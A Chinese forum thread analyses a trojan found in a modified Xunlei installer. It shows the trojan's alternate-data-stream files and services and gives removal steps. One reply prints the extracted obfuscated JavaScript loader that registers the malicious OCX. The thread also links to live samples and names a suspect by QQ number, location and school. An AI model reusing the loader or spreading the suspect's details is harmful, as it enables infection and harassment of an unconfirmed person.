近期需警惕的一个木马

xiaojinglf

今天偶然翻看了一下小红伞的日志，发现报windows\media\Desktop.ini:wmic.js。

于是查最近安装过的程序，检查为从自由天空论坛下载的迅雷极速版。

对于迅雷极速版，我安装过两次，第一次是安装的官方极速版。后来发现官方极速版的确有后台不断网络访问。因此又从自由天空论坛下载过睿派克修改版。后来无意间看小红伞日志，发现此现象。

随后我在虚拟机对在自由天空下载的该文件进行测试。果然发现问题：
改安装包会先释放原版睿派克修改版迅雷极速版，然后偷偷完成病毒行为。迅雷会被正确安装。
但是该包在windows\media文件夹建立数个文件：

qq.txt（内容为：532A4C47595E545F47434C797E764CA4E2C3B1ABEA3E6B22222227712228203D237175713D212026293D712274753D2028202022722320232029746D4C7568607C7F62753E6468642A7568607C7F62753E756875A979B4ECA）
根据我转换，此人的qq号为：2543537866。网名☆☆★  中国 河北 唐山 查其QQ空间，发现有其毕业院校资料：河北理工大学轻工学院 信息科学与技术部。不清楚该人是否照片中人。

api.txt（内容为：C:\WINDOWS\system32\COM_ActiveX.ocx）
windows 还原.wav(该文件实际是txt文件，内部记录了当前安装时
间）。而系统真正的文件名称是英文。见附件

修改desktop.ini建立数据流驱动C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js和C:\WINDOWS\syswow64\wbem\Desktop.ini:wmic.js
同时，我监控时候捕捉到一个c:\Windows\Media\ActiveX.ocx的建立，并注册了该文件，但是随后再也找不到了，应该是被移动到C:\WINDOWS\system32\COM_ActiveX.ocx和syswow64\COM_ActiveX.ocx了

根据我进一步观察，发现这个COM_ActiveX.ocx日益庞大，我机器发现后已经是126M。打开后发现文件头为MZ，但是此文件中乱码及代码很多，疑为其配置文件及抓取到了用户资料。

重启计算机后的情况：
该木马新建了C:\Windows\Media\Desktop.ini:xinstaller.sys.小红伞检出报警，但自动允许并记录（我设置是拒绝访问）。
Virus or unwanted program 'TR/Rootkit.Gen [trojan]'
detected in file 'C:\Windows\Media\Desktop.ini:xinstaller.sys.
Action performed: Allow access

新建了服务:C:\WINDOWS\Media\start.wav:Worktask.dll
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\WorktaskService
注册表名称:ServiceDll
注册表值:C:\WINDOWS\Media\start.wav:Worktask.dll


新建服务:C:\Windows\SysWow64\wbem\Desktop.ini:wmic.js
注册表路径:HKLM\SYSTEM\CurrentControlSet\Services\txbqzeub
注册表值:C:\WINDOWS\System32\WScript.exe C:\WINDOWS\system32\wbem\Desktop.ini:wmic.js


用AlternateStreamView扫描后发现。可以删除。但是此时千万不要先删除。
首先到注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\heng_pro，删除heng_pro这个服务。重启计算机。然后在AlternateStreamView扫描并删除这个数据流
注意：这个服务的名称不是一定的。

然后我还原虚拟机，直接用提取的睿派克迅雷安装，无以上问题，证明文件被人恶意修改过。为证实是否是睿派克有问题。我又从睿派克官网下载新版本极速迅雷ThunderSpeed1.0.3.32。安装无问题。
证明是自由天空论坛的 1.0.3.28是被人修改后的恶意版本。再次翻查自由天空论坛该贴，发现找不到。不知道是版主发现后删除，还是发布者删除了。然后我发现出现了新版本，下载再次测试，发现为同一现象。
对应帖子是【2014/04/01】迅雷极速版1.0.3.32精简优化版(高速通道 离线下载) - PC 精品软件资源分享区 - IT天空
http://bbs.itiankong.com/forum.p ... &extra=page%3D1


感兴趣的朋友请尽快前往抓取分析吧。请注意，有木马。http://aql99ai2uy.l28.yunpan.cn/lk/QIe3whBiSL2tw

xiaojinglf

样本并不能检出病毒，只是其附属文件。

yaoogle007

所以都是下的官方版好，安全。。。。。。。。。

will

windows\media\Desktop.ini:wmic.js   这貌似是NTFS数据流文件   在FAT32格式下检测不到

xiaojinglf

will 发表于 2014-4-5 17:06
windows\media\Desktop.ini:wmic.js   这貌似是NTFS数据流文件   在FAT32格式下检测不到

该文件可以导出。导出后打开内容如下：
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('5 a=3 4("2.0");a.1("7 9.b /8");6 a;',12,12,'Shell|run|Wscript|new|ActiveXObject|var|delete|regsvr32|s|COM_ActiveX||ocx'.split('|'),0,{}))

cfans

ADS流病毒。

上海一哥

无聊的病毒

vm001

无关紧要的拦截就不截图了
http://yunpan.cn/QIpQNBDcAeA9u

枫界易城

过来看看！，，，，，，

xiaojinglf

vm001 发表于 2014-4-5 18:51
无关紧要的拦截就不截图了
http://yunpan.cn/QIpQNBDcAeA9u

奇怪了。我这里金山毒霸完全不拦截